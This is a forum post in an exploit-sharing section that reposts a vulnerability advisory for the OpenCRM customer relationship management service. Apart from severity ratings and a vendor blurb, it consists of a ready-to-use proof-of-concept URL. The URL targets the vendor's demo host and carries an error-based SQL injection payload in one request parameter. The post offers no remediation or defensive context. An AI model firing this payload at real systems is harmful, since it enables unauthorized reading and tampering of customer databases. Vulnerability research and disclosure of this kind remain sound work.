Jump to content
Aerosol

OpenCRM SQL Injection

By Aerosol, in Exploituri

Recommended Posts

Aerosol Newbie

Aerosol

Posted
Posted

Services Affected: OpenCRM from Software Add-ons - Adding Value to Your Business

Threat Level: High

Severity: High

CVSS Severity Score: 8.0

Impact type: Complete confidentiality, integrity and availability violation.

Vulnerability:

(3) Error-Based SQL Injection Vulnerabilities

(2) Time-Based Blind SQL Injection Vulnerabilities

Vendor Overview

OpenCRM is a Software as a Service (SaaS) Customer Relationship Management solution. A leading

OpenCRM software, and a true alternative to Salesforce, and other SaaS hosted CRM providers.

Proof of Concept:

https://demo.opencrm.co.uk:443/index.php?action=index&module=Calendar&action=setField&curr_row=&field=a
ssigned_user_id&mode=list&module=Field&popuptype=&record=1&value='AND(Select%201%20from(selec
t%20count(*)%2cconcat((select%20concat(CHAR(52)%2cCHAR(67)%2cCHAR(117)%2cCHAR(112)%2cC
HAR(73)%2cCHAR(108)%2cCHAR(88)%2cCHAR(72)%2cCHAR(51)%2cCHAR(52)%2cCHAR(114))%20f
rom%20information_schema.tables%20limit%200%2c1)%2cfloor(rand(0)*2))x%20from%20information_sche
ma.tables%20group%20by%20x)a)and'&viewid=0

Read more: http://dl.packetstormsecurity.net/1502-exploits/OpenCRM.pdf

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...